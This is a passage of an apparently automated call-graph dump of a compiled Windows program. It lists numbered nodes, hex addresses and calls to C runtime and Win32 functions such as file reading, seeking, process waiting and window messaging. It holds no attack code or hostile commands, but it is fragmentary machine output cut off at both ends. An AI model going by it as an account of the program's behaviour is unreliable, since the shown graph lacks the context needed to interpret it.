Shell_NotifyIconW 81665->81668 81669 42aa50 Shell_NotifyIconW 81665->81669 81666->81663 81670 401be0 79 API calls 81668->81670 81671 40e2da 81670->81671 81671->81560 81672->81542 81673->81555 81674->81542 81675->81548 81677 401b76 _wcslen 81676->81677 81678 41171a 77 API calls 81677->81678 81681 401bc5 81677->81681 81679 401bad _memcpy_s 81678->81679 81680 41171a 77 API calls 81679->81680 81680->81681 81682 40d3b0 77 API calls 2 library calls 81681->81682 81682->81562 81683->81565 81685 40c060 77 API calls 81684->81685 81686 401f90 81685->81686 81687 402940 81686->81687 81688 40294a __write_nolock 81687->81688 81689 4021e0 77 API calls 81688->81689 81691 402972 81689->81691 81700 4029a4 81691->81700 81767 401cf0 81691->81767 81692 402ae0 77 API calls 81692->81700 81693 402a8c 81694 401b70 77 API calls 81693->81694 81699 402abe 81693->81699 81696 402ab3 81694->81696 81695 401b70 77 API calls 81695->81700 81771 40d970 77 API calls 2 library calls 81696->81771 81699->81576 81700->81692 81700->81693 81700->81695 81701 401cf0 77 API calls 81700->81701 81770 40d970 77 API calls 2 library calls 81700->81770 81701->81700 81772 40f5e0 81702->81772 81705 40ffa6 81705->81578 81707 42b6d8 81710 42b6e6 81707->81710 81828 434fe1 81707->81828 81709 413a88 ___convertcp 69 API calls 81711 42b6f5 81709->81711 81710->81709 81712 434fe1 108 API calls 81711->81712 81713 42b702 81712->81713 81713->81578 81715 41171a 77 API calls 81714->81715 81716 401fd6 81715->81716 81716->81581 81718 401a03 81717->81718 81722 4019e5 81717->81722 81719 401a1a 81718->81719 81718->81722 82433 404260 78 API calls 81719->82433 81721 4019ff 81721->81584 81722->81721 82432 404260 78 API calls 81722->82432 81723 401a26 81723->81584 81726 40c3e4 81725->81726 81727 40c42c 81725->81727 81730 40c3f0 81726->81730 81737 42a475 81726->81737 81728 42a422 81727->81728 81729 40c435 81727->81729 81733 42a445 81728->81733 81738 42a427 81728->81738 81731 40c441 81729->81731 81736 42a455 81729->81736 82434 4042f0 81730->82434 81735 4042f0 77 API calls 81731->81735 82441 453155 77 API calls 81733->82441 81742 40c3fb 81735->81742 82442 453155 77 API calls 81736->82442 82443 453155 77 API calls 81737->82443 81738->81742 82440 453155 77 API calls 81738->82440 81742->81594 81742->81742 81744 41171a 77 API calls 81743->81744 81745 40c088 81744->81745 81746 41171a 77 API calls 81745->81746 81747 402061 81746->81747 81748 401a70 81747->81748 81749 401a90 81748->81749 81751 401a77 81748->81751 81750 4021e0 77 API calls 81749->81750 81753 401a9c 81750->81753 81752 401a8d 81751->81752 82444 404080 77 API calls _memcpy_s 81751->82444 81752->81598 81753->81598 81756 4115e1 81755->81756 81757 411650 81755->81757 81762 40207d 81756->81762 82445 417f23 69 API calls __getptd_noexit 81756->82445 82447 4114bf 81 API calls 3 library calls 81757->82447 81760 4115ed 82446 417ebb 7 API calls 2 library calls 81760->82446 81762->81601 81762->81602 81763->81629 81764->81631 81765->81637 81766->81637 81768 402ae0 77 API calls 81767->81768 81769 401cf7 81768->81769 81769->81691 81770->81700 81771->81699 81832 40f580 81772->81832 81774 40f5f8 _strcat ctype 81840 40f6d0 81774->81840 81779 42b2ee 81869 4151b0 81779->81869 81781 40f679 81781->81779 81783 40f681 81781->81783 81856 414e94 81783->81856 81787 40f68b 81787->81705 81791 452574 81787->81791 81788 42b31d 81875 415484 81788->81875 81790 42b33d 81792 41557c _fseek 107 API calls 81791->81792 81793 4525df 81792->81793 82377 4523ce 81793->82377 81796 4525fc 81796->81707 81797 4151b0 __fread_nolock 83 API calls 81798 45261d 81797->81798 81799 4151b0 __fread_nolock 83 API calls 81798->81799 81800 45262e 81799->81800 81801 4151b0 __fread_nolock 83 API calls 81800->81801 81802 452649 81801->81802 81803 4151b0 __fread_nolock 83 API calls 81802->81803 81804 452666 81803->81804 81805 41557c _fseek 107 API calls 81804->81805 81806 452682 81805->81806 81807 4138ba _malloc 69 API calls 81806->81807 81808 45268e 81807->81808 81809 4138ba _malloc 69 API calls 81808->81809 81810 45269b 81809->81810 81811 4151b0 __fread_nolock 83 API calls 81810->81811 81812 4526ac 81811->81812 81813 44afdc GetSystemTimeAsFileTime 81812->81813 81814 4526bf 81813->81814 81815 4526d5 81814->81815 81816 4526fd 81814->81816 81817 413a88 ___convertcp 69 API calls 81815->81817 81818 452704 81816->81818 81819 45275b 81816->81819 81821 4526df 81817->81821 82383 44b195 81818->82383 81820 413a88 ___convertcp 69 API calls 81819->81820 81823 452759 81820->81823 81824 413a88 ___convertcp 69 API calls 81821->81824 81823->81707 81826 4526e8 81824->81826 81825 452753 81827 413a88 ___convertcp 69 API calls 81825->81827 81826->81707 81827->81823 81829 434feb 81828->81829 81831 434ff1 81828->81831 81830 414e94 __fcloseall 108 API calls 81829->81830 81830->81831 81831->81710 81833 429440 81832->81833 81834 40f589 _wcslen 81832->81834 81835 40f58f WideCharToMultiByte 81834->81835 81836 40f5d8 81835->81836 81837 40f5ad 81835->81837 81836->81774 81838 41171a 77 API calls 81837->81838 81839 40f5bb WideCharToMultiByte 81838->81839 81839->81774 81841 40f6dd _strlen 81840->81841 81888 40f790 81841->81888 81844 414e06 81908 414d40 81844->81908 81846 40f666 81846->81779 81847 40f450 81846->81847 81851 40f45a _strcat _memcpy_s __write_nolock 81847->81851 81848 4151b0 __fread_nolock 83 API calls 81848->81851 81850 42936d 81852 41557c _fseek 107 API calls 81850->81852 81851->81848 81851->81850 81855 40f531 81851->81855 81991 41557c 81851->81991 81853 429394 81852->81853 81854 4151b0 __fread_nolock 83 API calls 81853->81854 81854->81855 81855->81781 81857 414ea0 __locking 81856->81857 81858 414ed1 81857->81858 81859 414eb4 81857->81859 81861 415965 __lock_file 70 API calls 81858->81861 81866 414ec9 __locking 81858->81866 82130 417f23 69 API calls __getptd_noexit 81859->82130 81863 414ee9 81861->81863 81862 414eb9 82131 417ebb 7 API calls 2 library calls 81862->82131 82114 414e1d 81863->82114 81866->81787 82199 41511a 81869->82199 81871 4151c8 81872 44afdc 81871->81872 82370 4431e0 81872->82370 81874 44affd 81874->81788 81876 415490 __locking 81875->81876 81877 4154bb 81876->81877 81878 41549e 81876->81878 81880 415965 __lock_file 70 API calls 81877->81880 82374 417f23 69 API calls __getptd_noexit 81878->82374 81882 4154c3 81880->81882 81881 4154a3 82375 417ebb 7 API calls 2 library calls 81881->82375 81884 4152e7 __ftell_nolock 73 API calls 81882->81884 81885 4154cf 81884->81885 82376 4154e8 LeaveCriticalSection LeaveCriticalSection _fprintf 81885->82376 81887 4154b3 __locking 81887->81790 81890 40f7ae _memset 81888->81890 81889 42a349 81890->81889 81892 40f628 81890->81892 81893 415258 81890->81893 81892->81844 81894 415285 81893->81894 81895 415268 81893->81895 81894->81895 81897 41528c 81894->81897 81904 417f23 69 API calls __getptd_noexit 81895->81904 81906 41c551 105 API calls 13 library calls 81897->81906 81898 41526d 81905 417ebb 7 API calls 2 library calls 81898->81905 81901 4152b2 81902 41527d 81901->81902 81907 4191c9 103 API calls 5 library calls 81901->81907 81902->81890 81904->81898 81906->81901 81907->81902 81909 414d4c __locking 81908->81909 81910 414d5f 81909->81910 81912 414d95 81909->81912 81960 417f23 69 API calls __getptd_noexit 81910->81960 81927 41e28c 81912->81927 81913 414d64 81961 417ebb 7 API calls 2 library calls 81913->81961 81916 414d9a 81918 414da1 81916->81918 81919 414dae 81916->81919 81917 414d74 __locking @_EH4_CallFilterFunc@8 81917->81846 81962 417f23 69 API calls __getptd_noexit 81918->81962 81921 414dd6 81919->81921 81922 414db6 81919->81922 81945 41dfd8 81921->81945 81963 417f23 69 API calls __getptd_noexit 81922->81963 81928 41e298 __locking 81927->81928 81929 418407 __lock 69 API calls 81928->81929 81940 41e2a6 81929->81940 81930 41e31b 81965 41e3bb 81930->81965 81931 41e322 81933 416fb6 __malloc_crt 69 API calls 81931->81933 81935 41e32c 81933->81935 81934 41e3b0 __locking 81934->81916 81935->81930 81970 4189e6 InitializeCriticalSectionAndSpinCount __locking 81935->81970 81937 418344 __mtinitlocknum 69 API calls 81937->81940 81939 41e351 81941 41e35c 81939->81941 81942 41e36f EnterCriticalSection 81939->81942 81940->81930 81940->81931 81940->81937 81968 4159a6 70 API calls __lock 81940->81968 81969 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 81940->81969 81944 413a88 ___convertcp 69 API calls 81941->81944 81942->81930 81944->81930 81953 41dffb __wopenfile 81945->81953 81946 41e015 81975 417f23 69 API calls __getptd_noexit 81946->81975 81948 41e01a 81976 417ebb 7 API calls 2 library calls 81948->81976 81949 41e247 81972 425db0 81949->81972 81953->81946 81959 41e1e9 81953->81959 81977 4136bc 81 API calls 2 library calls 81953->81977 81955 41e1e2 81955->81959 81978 4136bc 81 API calls 2 library calls 81955->81978 81957 41e201 81957->81959 81979 4136bc 81 API calls 2 library calls 81957->81979 81959->81946 81959->81949 81960->81913 81962->81917 81963->81917 81964 414dfc LeaveCriticalSection LeaveCriticalSection _fprintf 81964->81917 81971 41832d LeaveCriticalSection 81965->81971 81967 41e3c2 81967->81934 81968->81940 81969->81940 81970->81939 81971->81967 81980 425ce4 81972->81980 81974 414de1 81974->81964 81975->81948 81977->81955 81978->81957 81979->81959 81983 425cf0 __locking 81980->81983 81981 425d03 81982 417f23 __locking 69 API calls 81981->81982 81984 425d08 81982->81984 81983->81981 81985 425d41 81983->81985 81986 417ebb __locking 7 API calls 81984->81986 81987 4255c4 __tsopen_nolock 134 API calls 81985->81987 81990 425d17 __locking 81986->81990 81988 425d5b 81987->81988 81989 425d82 __sopen_helper LeaveCriticalSection 81988->81989 81989->81990 81990->81974 81994 415588 __locking 81991->81994 81992 415596 82022 417f23 69 API calls __getptd_noexit 81992->82022 81993 4155c4 82004 415965 81993->82004 81994->81992 81994->81993 81997 41559b 82023 417ebb 7 API calls 2 library calls 81997->82023 82003 4155ab __locking 82003->81851 82005 415977 82004->82005 82006 415999 EnterCriticalSection 82004->82006 82005->82006 82008 41597f 82005->82008 82007 4155cc 82006->82007 82010 4154f2 82007->82010 82009 418407 __lock 69 API calls 82008->82009 82009->82007 82011 415512 82010->82011 82012 415502 82010->82012 82013 415524 82011->82013 82025 4152e7 82011->82025 82079 417f23 69 API calls __getptd_noexit 82012->82079 82042 41486c 82013->82042 82017 415507 82024 4155f7 LeaveCriticalSection LeaveCriticalSection _fprintf 82017->82024 82022->81997 82024->82003 82026 41531a 82025->82026 82027 4152fa 82025->82027 82029 41453a __fileno 69 API calls 82026->82029 82080 417f23 69 API calls __getptd_noexit 82027->82080 82031 415320 82029->82031 82030 4152ff 82081 417ebb 7 API calls 2 library calls 82030->82081 82033 41efd4 __locking 73 API calls 82031->82033 82034 415335 82033->82034 82035 415364 82034->82035 82036 4153a9 82034->82036 82041 41530f 82034->82041 82038 41efd4 __locking 73 API calls 82035->82038 82035->82041 82082 417f23 69 API calls __getptd_noexit 82036->82082 82039 415404 82038->82039 82040 41efd4 __locking 73 API calls 82039->82040 82039->82041 82040->82041 82041->82013 82043 4148a7 82042->82043 82044 414885 82042->82044 82048 41453a 82043->82048 82044->82043 82045 41453a __fileno 69 API calls 82044->82045 82046 4148a0 82045->82046 82083 41c3cf 103 API calls 3 library calls 82046->82083 82049 41455e 82048->82049 82050 414549 82048->82050 82054 41efd4 82049->82054 82084 417f23 69 API calls __getptd_noexit 82050->82084 82052 41454e 82085 417ebb 7 API calls 2 library calls 82052->82085 82055 41efe0 __locking 82054->82055 82056 41f003 82055->82056 82057 41efe8 82055->82057 82058 41f011 82056->82058 82063 41f052 82056->82063 82106 417f36 69 API calls __getptd_noexit 82057->82106 82108 417f36 69 API calls __getptd_noexit 82058->82108 82061 41efed 82107 417f23 69 API calls __getptd_noexit 82061->82107 82062 41f016 82109 417f23 69 API calls __getptd_noexit 82062->82109 82086 41ba3b 82063->82086 82067 41f01d 82110 417ebb 7 API calls 2 library calls 82067->82110 82068 41f058 82070 41f065 82068->82070 82071 41f07b 82068->82071 82096 41ef5f 82070->82096 82111 417f23 69 API calls __getptd_noexit 82071->82111 82073 41eff5 __locking 82073->82017 82075 41f073 82113 41f0a6 LeaveCriticalSection __unlock_fhandle 82075->82113 82076 41f080 82112 417f36 69 API calls __getptd_noexit 82076->82112 82079->82017 82080->82030 82082->82041 82083->82043 82084->82052 82087 41ba47 __locking 82086->82087 82088 41baa2 82087->82088 82089 418407 __lock 69 API calls 82087->82089 82090 41bac4 __locking 82088->82090 82091 41baa7 EnterCriticalSection 82088->82091 82092 41ba73 82089->82092 82090->82068 82091->82090 82093 41ba8a 82092->82093 82094 4189e6 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 82092->82094 82095 41bad2 ___lock_fhandle LeaveCriticalSection 82093->82095 82094->82093 82095->82088 82097 41b9c4 __close_nolock 69 API calls 82096->82097 82098 41ef6e 82097->82098 82099 41ef84 SetFilePointer 82098->82099 82100 41ef74 82098->82100 82102 41ef9b GetLastError 82099->82102 82103 41efa3 82099->82103 82101 417f23 __locking 69 API calls 82100->82101 82104 41ef79 82101->82104 82102->82103 82103->82104 82105 417f49 __dosmaperr 69 API calls 82103->82105 82104->82075 82105->82104 82106->82061 82107->82073 82108->82062 82109->82067 82111->82076 82112->82075 82113->82073 82115 414e31 82114->82115 82117 414e4d 82114->82117 82160 417f23 69 API calls __getptd_noexit 82115->82160 82118 414e46 82117->82118 82119 41486c __flush 103 API calls 82117->82119 82132 414f08 LeaveCriticalSection LeaveCriticalSection _fprintf 82118->82132 82121 414e59 82119->82121 82120 414e36 82161 417ebb 7 API calls 2 library calls 82120->82161 82133 41e680 82121->82133 82125 41453a __fileno 69 API calls 82126 414e67 82125->82126 82137 41e5b3 82126->82137 82128 414e6d 82128->82118 82129 413a88 ___convertcp 69 API calls 82128->82129 82129->82118 82130->81862 82132->81866 82134 41e690 82133->82134 82136 414e61 82133->82136 82135 413a88 ___convertcp 69 API calls 82134->82135 82134->82136 82135->82136 82136->82125 82138 41e5bf __locking 82137->82138 82139 41e5e2 82138->82139 82140 41e5c7 82138->82140 82142 41e5f0 82139->82142 82146 41e631 82139->82146 82177 417f36 69 API calls __getptd_noexit 82140->82177 82179 417f36 69 API calls __getptd_noexit 82142->82179 82144 41e5cc 82178 417f23 69 API calls __getptd_noexit 82144->82178 82145 41e5f5 82180 417f23 69 API calls __getptd_noexit 82145->82180 82149 41ba3b ___lock_fhandle 70 API calls 82146->82149 82152 41e637 82149->82152 82150 41e5d4 __locking 82150->82128 82151 41e5fc 82181 417ebb 7 API calls 2 library calls 82151->82181 82154 41e652 82152->82154 82155 41e644 82152->82155 82182 417f23 69 API calls __getptd_noexit 82154->82182 82162 41e517 82155->82162 82158 41e64c 82183 41e676 LeaveCriticalSection __unlock_fhandle 82158->82183 82160->82120 82184 41b9c4 82162->82184 82164 41e57d 82197 41b93e 70 API calls __locking 82164->82197 82166 41e527 82166->82164 82167 41e55b 82166->82167 82169 41b9c4 __close_nolock 69 API calls 82166->82169 82167->82164 82170 41b9c4 __close_nolock 69 API calls 82167->82170 82168 41e585 82172 41e5a7 82168->82172 82198 417f49 69 API calls 2 library calls 82168->82198 82173 41e552 82169->82173 82171 41e567 CloseHandle 82170->82171 82171->82164 82174 41e573 GetLastError 82171->82174 82172->82158 82176 41b9c4 __close_nolock 69 API calls 82173->82176 82174->82164 82176->82167 82177->82144 82178->82150 82179->82145 82180->82151 82182->82158 82183->82150 82185 41b9d1 82184->82185 82187 41b9e9 82184->82187 82186 417f36 __locking 69 API calls 82185->82186 82189 41b9d6 82186->82189 82188 417f36 __locking 69 API calls 82187->82188 82190 41ba2e 82187->82190 82191 41ba17 82188->82191 82192 417f23 __locking 69 API calls 82189->82192 82190->82166 82193 417f23 __locking 69 API calls 82191->82193 82194 41b9de 82192->82194 82195 41ba1e 82193->82195 82194->82166 82196 417ebb __locking 7 API calls 82195->82196 82196->82190 82197->82168 82198->82172 82200 415126 __locking 82199->82200 82201 41513a _memset 82200->82201 82202 41516f 82200->82202 82203 415164 __locking 82200->82203 82228 417f23 69 API calls __getptd_noexit 82201->82228 82204 415965 __lock_file 70 API calls 82202->82204 82203->81871 82205 415177 82204->82205 82212 414f10 82205->82212 82207 415154 82229 417ebb 7 API calls 2 library calls 82207->82229 82215 414f2e _memset 82212->82215 82219 414f4c 82212->82219 82213 414f37 82281 417f23 69 API calls __getptd_noexit 82213->82281 82215->82213 82215->82219 82225 414f8b 82215->82225 82216 414f3c 82282 417ebb 7 API calls 2 library calls 82216->82282 82230 4151a6 LeaveCriticalSection LeaveCriticalSection _fprintf 82219->82230 82220 4150d5 _memset 82285 417f23 69 API calls __getptd_noexit 82220->82285 82221 4150a9 _memset 82284 417f23 69 API calls __getptd_noexit 82221->82284 82222 41453a __fileno 69 API calls 82222->82225 82225->82219 82225->82220 82225->82221 82225->82222 82231 41ed9e 82225->82231 82261 41e6b1 82225->82261 82283 41ee9b 69 API calls 3 library calls 82225->82283 82228->82207 82230->82203 82232 41edaa __locking 82231->82232 82233 41edb2 82232->82233 82234 41edcd 82232->82234 82355 417f36 69 API calls __getptd_noexit 82233->82355 82236 41eddb 82234->82236 82239 41ee1c 82234->82239 82357 417f36 69 API calls __getptd_noexit 82236->82357 82237 41edb7 82356 417f23 69 API calls __getptd_noexit 82237->82356 82242 41ee29 82239->82242 82243 41ee3d 82239->82243 82241 41ede0 82358 417f23 69 API calls __getptd_noexit 82241->82358 82360 417f36 69 API calls __getptd_noexit 82242->82360 82246 41ba3b ___lock_fhandle 70 API calls 82243->82246 82249 41ee43 82246->82249 82247 41ede7 82359 417ebb 7 API calls 2 library calls 82247->82359 82248 41ee2e 82361 417f23 69 API calls __getptd_noexit 82248->82361 82252 41ee50 82249->82252 82253 41ee66 82249->82253 82251 41edbf __locking 82251->82225 82286 41e7dc 82252->82286 82362 417f23 69 API calls __getptd_noexit 82253->82362 82257 41ee5e 82364 41ee91 LeaveCriticalSection __unlock_fhandle 82257->82364 82258 41ee6b 82363 417f36 69 API calls __getptd_noexit 82258->82363 82262 41e6c1 82261->82262 82265 41e6de 82261->82265 82368 417f23 69 API calls __getptd_noexit 82262->82368 82264 41e6c6 82369 417ebb 7 API calls 2 library calls 82264->82369 82267 41e713 82265->82267 82275 41e6d6 82265->82275 82365 423600 82265->82365 82269 41453a __fileno 69 API calls 82267->82269 82270 41e727 82269->82270 82271 41ed9e __read 81 API calls 82270->82271 82272 41e72e 82271->82272 82273 41453a __fileno 69 API calls 82272->82273 82272->82275 82274 41e751 82273->82274 82274->82275 82276 41453a __fileno 69 API calls 82274->82276 82275->82225 82277 41e75d 82276->82277 82277->82275 82278 41453a __fileno 69 API calls 82277->82278 82279 41e769 82278->82279 82280 41453a __fileno 69 API calls 82279->82280 82280->82275 82281->82216 82283->82225 82284->82216 82285->82216 82287 41e813 82286->82287 82288 41e7f8 82286->82288 82290 41e822 82287->82290 82292 41e849 82287->82292 82289 417f36 __locking 69 API calls 82288->82289 82291 41e7fd 82289->82291 82293 417f36 __locking 69 API calls 82290->82293 82295 417f23 __locking 69 API calls 82291->82295 82294 41e868 82292->82294 82308 41e87c 82292->82308 82296 41e827 82293->82296 82297 417f36 __locking 69 API calls 82294->82297 82309 41e805 82295->82309 82299 417f23 __locking 69 API calls 82296->82299 82301 41e86d 82297->82301 82298 41e8d4 82300 417f36 __locking 69 API calls 82298->82300 82302 41e82e 82299->82302 82303 41e8d9 82300->82303 82304 417f23 __locking 69 API calls 82301->82304 82305 417ebb __locking 7 API calls 82302->82305 82306 417f23 __locking 69 API calls 82303->82306 82307 41e874 82304->82307 82305->82309 82306->82307 82311 417ebb __locking 7 API calls 82307->82311 82308->82298 82308->82309 82310 41e8b0 82308->82310 82312 41e8f5 82308->82312 82309->82257 82310->82298 82317 41e8bb ReadFile 82310->82317 82311->82309 82314 416fb6 __malloc_crt 69 API calls 82312->82314 82318 41e90b 82314->82318 82315 41ed62 GetLastError 82319 41ebe8 82315->82319 82320 41ed6f 82315->82320 82316 41e9e7 82316->82315 82323 41e9fb 82316->82323 82317->82315 82317->82316 82321 41e931 82318->82321 82322 41e913 82318->82322 82329 417f49 __dosmaperr 69 API calls 82319->82329 82351 41eb6d 82319->82351 82325 417f23 __locking 69 API calls 82320->82325 82324 423462 __lseeki64_nolock 71 API calls 82321->82324 82326 417f23 __locking 69 API calls 82322->82326 82334 41ea17 82323->82334 82335 41ec2d 82323->82335 82323->82351 82327 41e93d 82324->82327 82328 41ed74 82325->82328 82330 41e918 82326->82330 82327->82317 82331 417f36 __locking 69 API calls 82328->82331 82329->82351 82332 417f36 __locking 69 API calls 82330->82332 82331->82351 82332->82309 82333 413a88 ___convertcp 69 API calls 82333->82309 82336 41eafa 82334->82336 82338 41ea7d ReadFile 82334->82338 82337 41eca5 ReadFile 82335->82337 82335->82351 82343 41eb75 82336->82343 82344 41eb68 82336->82344 82336->82351 82352 41eb32 82336->82352 82340 41ecc4 GetLastError 82337->82340 82346 41ecce 82337->82346 82339 41ea9b GetLastError 82338->82339 82345 41eaa5 82338->82345 82339->82334 82339->82345 82340->82335 82340->82346 82341 41ebbe MultiByteToWideChar 82342 41ebe2 GetLastError 82341->82342 82341->82351 82342->82319 82348 41ebac 82343->82348 82343->82352 82347 417f23 __locking 69 API calls 82344->82347 82345->82334 82349 423462 __lseeki64_nolock 71 API calls 82345->82349 82346->82335 82350 423462 __lseeki64_nolock 71 API calls 82346->82350 82347->82351 82353 423462 __lseeki64_nolock 71 API calls 82348->82353 82349->82345 82350->82346 82351->82309 82351->82333 82352->82341 82354 41ebbb 82353->82354 82354->82341 82355->82237 82356->82251 82357->82241 82358->82247 82360->82248 82361->82247 82362->82258 82363->82257 82364->82251 82366 416fb6 __malloc_crt 69 API calls 82365->82366 82367 423615 82366->82367 82367->82267 82368->82264 82373 414cef GetSystemTimeAsFileTime __aulldiv 82370->82373 82372 4431ef 82372->81874 82373->82372 82374->81881 82376->81887 82382 4523e1 _wcscpy 82377->82382 82378 44afdc GetSystemTimeAsFileTime 82378->82382 82379 4151b0 83 API calls __fread_nolock 82379->82382 82380 452553 82380->81796 82380->81797 82381 41557c 107 API calls _fseek 82381->82382 82382->82378 82382->82379 82382->82380 82382->82381 82384 44b1b4 82383->82384 82385 44b1a6 82383->82385 82387 44b1ca 82384->82387 82388 414e06 140 API calls 82384->82388 82389 44b1c2 82384->82389 82386 414e06 140 API calls 82385->82386 82386->82384 82418 4352d1 83 API calls 2 library calls 82387->82418 82390 44b2c1 82388->82390 82389->81825 82390->82387 82393 44b2cf 82390->82393 82392 44b20d 82394 44b211 82392->82394 82395 44b23b 82392->82395 82396 414e94 __fcloseall 108 API calls 82393->82396 82401 44b2dc 82393->82401 82398 414e94 __fcloseall 108 API calls 82394->82398 82400 44b21e 82394->82400 82419 43526e 82395->82419 82396->82401 82398->82400 82399 44b22e 82399->81825 82400->82399 82403 414e94 __fcloseall 108 API calls 82400->82403 82401->81825 82402 44b242 82404 44b270 82402->82404 82405 44b248 82402->82405 82403->82399 82429 44b0af 113 API calls 82404->82429 82407 44b255 82405->82407 82410 414e94 __fcloseall 108 API calls 82405->82410 82408 44b265 82407->82408 82411 414e94 __fcloseall 108 API calls 82407->82411 82408->81825 82409 44b276 82430 43522c 69 API calls ___convertcp 82409->82430 82410->82407 82411->82408 82413 44b27c 82414 44b289 82413->82414 82415 414e94 __fcloseall 108 API calls 82413->82415 82416 44b299 82414->82416 82417 414e94 __fcloseall 108 API calls 82414->82417 82415->82414 82416->81825 82417->82416 82418->82392 82420 4138ba _malloc 69 API calls 82419->82420 82421 43527d 82420->82421 82422 4138ba _malloc 69 API calls 82421->82422 82423 43528d 82422->82423 82424 4138ba _malloc 69 API calls 82423->82424 82425 43529d 82424->82425 82427 4352bc 82425->82427 82431 43522c 69 API calls ___convertcp 82425->82431 82427->82402 82428 4352c8 82428->82402 82429->82409 82430->82413 82431->82428 82432->81721 82433->81723 82435 404304 82434->82435 82439 40431c 82434->82439 82436 40c060 77 API calls 82435->82436 82435->82439 82437 404561 82436->82437 82438 411421 __cinit 76 API calls 82437->82438 82438->82439 82439->81742 82440->81742 82441->81736 82442->81742 82443->81742 82444->81752 82445->81760 82447->81762 82448->81647 82450 410148 SHGetDesktopFolder 82449->82450 82452 4101a3 _wcscpy 82449->82452 82451 41015a _wcscpy 82450->82451 82450->82452 82451->82452 82453 41018a SHGetPathFromIDListW 82451->82453 82452->81650 82453->82452 82454->81652 82456 40f5e0 154 API calls 82455->82456 82457 40f417 82456->82457 82458 42ca37 82457->82458 82460 40f42c 82457->82460 82461 42ca1f 82457->82461 82459 452574 142 API calls 82458->82459 82464 42ca50 82459->82464 82486 4037e0 141 API calls 7 library calls 82460->82486 82487 43717f 112 API calls _printf 82461->82487 82467 42ca76 82464->82467 82468 42ca54 82464->82468 82465 40f446 82465->81649 82466 42ca2d 82466->82458 82469 41171a 77 API calls 82467->82469 82470 434fe1 108 API calls 82468->82470 82485 42cacc ctype 82469->82485 82471 42ca5e 82470->82471 82488 43717f 112 API calls _printf 82471->82488 82473 42ccc3 82475 413a88 ___convertcp 69 API calls 82473->82475 82474 42ca6c 82474->82467 82476 42cccd 82475->82476 82477 434fe1 108 API calls 82476->82477 82478 42ccda 82477->82478 82482 401b70 77 API calls 82482->82485 82485->82473 82485->82482 82489 445051 77 API calls _memcpy_s 82485->82489 82490 44c80c 89 API calls 3 library calls 82485->82490 82491 44b408 77 API calls 82485->82491 82492 402cc0 77 API calls 2 library calls 82485->82492 82493 4026a0 77 API calls ctype 82485->82493 82486->82465 82487->82466 82488->82474 82489->82485 82490->82485 82491->82485 82492->82485 82493->82485 82494->81659 82495->81660 82496->81665 82497 431914 82498 431920 82497->82498 82499 431928 82498->82499 82500 43193d 82498->82500 82584 45e62e 118 API calls 3 library calls 82499->82584 82585 47f2b4 176 API calls 82500->82585 82503 43194a 82506 4095b0 ctype 82503->82506 82586 45e62e 118 API calls 3 library calls 82503->82586 82505 409708 82506->82505 82508 4097af 82506->82508 82509 409894 82506->82509 82511 4315b8 WaitForSingleObject 82506->82511 82514 431623 Sleep 82506->82514 82520 40986e Sleep 82506->82520 82521 4098f1 TranslateMessage DispatchMessageW 82506->82521 82534 45e62e 118 API calls 82506->82534 82540 4092c0 VariantClear 82506->82540 82541 4319c9 VariantClear 82506->82541 82543 409030 82506->82543 82557 40d300 82506->82557 82562 40d320 82506->82562 82568 40b380 121 API calls ctype 82506->82568 82569 409a40 167 API calls 4 library calls 82506->82569 82571 409340 176 API calls ctype 82506->82571 82587 40e380 VariantClear ctype 82506->82587 82508->82505 82570 40d590 VariantClear 82508->82570 82509->82506 82523 431673 CloseHandle 82509->82523 82524 43170c GetExitCodeProcess CloseHandle 82509->82524 82525 40d590 VariantClear 82509->82525 82526 46dd22 135 API calls 82509->82526 82528 46e641 136 API calls 82509->82528 82530 431781 Sleep 82509->82530 82539 4092c0 VariantClear 82509->82539 82572 447e59 77 API calls 82509->82572 82573 453b07 79 API calls 82509->82573 82574 4646a2 78 API calls 82509->82574 82576 444233 90 API calls _wcslen 82509->82576 82577 457509 VariantClear 82509->82577 82578 404120 82509->82578 82582 4717e3 VariantClear 82509->82582 82583 436272 6 API calls 82509->82583 82511->82506 82513 4315d6 GetExitCodeProcess CloseHandle 82511->82513 82575 40d590 VariantClear 82513->82575 82514->82509 82517 43163b timeGetTime 82514->82517 82517->82509 82520->82509 82522 409880 timeGetTime 82520->82522 82521->82506 82522->82509 82523->82509 82524->82509 82525->82509 82526->82509 82528->82509 82530->82506 82534->82506 82539->82509 82540->82506 82541->82506 82588 409110 119 API calls 82543->82588 82545 42ceb6 82598 410ae0 VariantClear ctype 82545->82598 82547 42cebf 82548 40906e 82548->82545 82549 42cea9 82548->82549 82551 4090a4 82548->82551 82597 45e62e 118 API calls 3 library calls 82549->82597 82589 404160 82551->82589 82554 4090f0 ctype 82554->82506 82555 4092c0 VariantClear 82556 4090be ctype 82555->82556 82556->82554 82556->82555 82558 4292e3 82557->82558 82559 40d30c 82557->82559 82560 429323 82558->82560 82561 4292fd TranslateAcceleratorW 82558->82561 82559->82506 82560->82506 82561->82559 82563 4296d0 82562->82563 82567 40d32f 82562->82567 82563->82506 82564 40d33c 82564->82506 82565 42972a IsDialogMessageW 82565->82564 82565->82567 82567->82564 82567->82565 82736 4340ec GetClassLongW 82567->82736 82568->82506 82569->82506 82570->82505 82571->82506 82572->82509 82573->82509 82574->82509 82575->82509 82576->82509 82577->82509 82579 40412e 82578->82579 82580 4092c0 VariantClear 82579->82580 82581 404138 82580->82581 82581->82530 82582->82509 82583->82509 82584->82506 82585->82503 82586->82506 82587->82506 82588->82548 82590 4092c0 VariantClear 82589->82590 82591 40416e 82590->82591 82592 404120 VariantClear 82591->82592 82593 40419b 82592->82593 82599 4734b7 82593->82599 82643 40efe0 82593->82643 82594 4041c6 82594->82545 82594->82556 82597->82545 82598->82547 82600 453063 113 API calls 82599->82600 82601 4734d7 82600->82601 82602 473545 82601->82602 82603 47350c 82601->82603 82651 463c42 82602->82651 82604 4092c0 VariantClear 82603->82604 82610 473514 82604->82610 82606 473558 82607 47355c 82606->82607 82624 473595 82606->82624 82609 4092c0 VariantClear 82607->82609 82608 473616 82664 463d7e 82608->82664 82617 473564 82609->82617 82610->82594 82612 453063 113 API calls 82612->82624 82613 473622 82614 473697 82613->82614 82615 47362c 82613->82615 82698 457838 82614->82698 82616 4092c0 VariantClear 82615->82616 82621 473634 82616->82621 82617->82594 82621->82594 82623 473655 82626 4092c0 VariantClear 82623->82626 82624->82608 82624->82612 82624->82623 82710 462f5a 89 API calls __wcsicoll 82624->82710 82638 47365d 82626->82638 82627 4736b0 82711 45e62e 118 API calls 3 library calls 82627->82711 82628 4736c9 82712 40e7e0 78 API calls 82628->82712 82631 4736ba 